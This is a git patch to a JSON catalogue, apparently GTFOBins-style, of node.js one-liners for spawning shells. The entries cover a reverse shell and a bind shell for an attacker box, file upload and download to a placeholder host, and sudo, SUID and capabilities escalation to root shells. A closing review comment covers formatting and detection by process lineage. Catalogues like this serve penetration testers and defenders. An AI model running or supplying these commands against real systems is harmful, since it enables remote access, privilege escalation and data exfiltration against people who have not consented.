From 199b4df1cdf66f23be2510696ca6e1e99d977ae7 Mon Sep 17 00:00:00 2001
From: "Mr. Robot"
Date: Sun, 21 Feb 2021 11:46:14 +0100
Subject: [PATCH] update node.js data source
---
 data/node.json | 36 +++++++++++++++++++++++++++++-------
 1 file changed, 29 insertions(+), 7 deletions(-)
diff --git a/data/node.json b/data/node.json
index 66156b6..416cbf6 100644
--- a/data/node.json
+++ b/data/node.json
@@ -2,35 +2,57 @@
 "functions": {
 "shell": [
 {
- "code": "node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+ "code": "node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+ }
+ ],
+ "file-write": [
+ {
+ "code": "node -e 'fs.writeFileSync(\"file_to_write\", \"DATA\")'"
+ }
+ ],
+ "file-read": [
+ {
+ "code": "node -e 'process.stdout.write(fs.readFileSync(\"/bin/ls\"))'"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch a remote file via HTTP GET request.",
+ "code": "node -e 'http.get([host], res => res.pipe(fs.createWriteStream([file])))'\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "Send a local file via HTTP POST request.",
+ "code": "node -e 'fs.createReadStream([file]).pipe(http.request([host]))'\n"
 }
 ],
 "reverse-shell": [
 {
 "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
- "code": "node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nnet.connect([port], \"[host]\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n});'\n"
+ "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.connect([port], [host], function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'\n"
 }
 ],
 "bind-shell": [
 {
 "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
- "code": "node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen([port]);'\n"
+ "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen([port])'\n"
 }
 ],
 "suid": [
 {
- "code": "./node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]});'\n"
+ "code": "./node -e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'\n"
 }
 ],
 "sudo": [
 {
- "code": "sudo node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+ "code": "sudo node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
 }
 ],
 "capabilities": [
 {
- "code": "./node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+ "code": "./node -e 'process.setuid(0); child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
 }
 ]
 }
-}
\ No newline at end of file
+}
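Review bot: The new `file-write` and `file-read` entries are inconsistent with the rest of the file: their `code` strings end in `'"` where every other entry ends in `'\n"`, and they hard-code `file_to_write` and `/bin/ls` where the `file-download` and `file-upload` entries added beside them use `[file]`-style placeholders. Pick one convention, and give both entries a `description` as the download/upload pair has. Separately, every entry now drops `require(...)` and appears to depend on Node exposing its built-in modules as globals inside `-e` scripts, which neither the commit message nor any `description` records; a line such as `"description": "Built-in modules are available as globals under node -e, so no require() is needed."` would make that assumption explicit. For readers who use this data to write detections, a command-line rule keyed on `require("child_process")` will not match the new forms, so process lineage (a `node` process spawning `/bin/sh`) is the more durable signal.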